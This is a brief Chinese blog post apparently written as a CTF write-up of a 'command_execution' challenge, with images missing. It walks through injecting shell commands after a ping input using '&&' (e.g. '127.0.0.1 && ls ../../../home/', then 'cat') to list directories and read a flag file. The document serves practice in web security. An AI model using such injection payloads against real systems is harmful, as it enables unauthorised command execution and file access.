|command_execution|命令执行

image
image

image

执行一个ping命令127.0.0.1成功

image

尝试在ping命令后面执行其他命令,用到管道符&&

image
查看上级目录
payload:127.0.0.1 && ls ../../../

image

尝试访问因为已经回到根目录了,尝试查看路径,最终在home下发现flag.txt文件

payload:127.0.0.1 && ls ../../../home/
image
这时候打开.txt文件,需要用cat (打开文件与访问路径有区别)
payload:127.0.0.1 && cat ../../../home/

image

得到flag

posted @ 2025-08-18 08:56  Dragon_Roar  阅读(3)  评论(0)    收藏  举报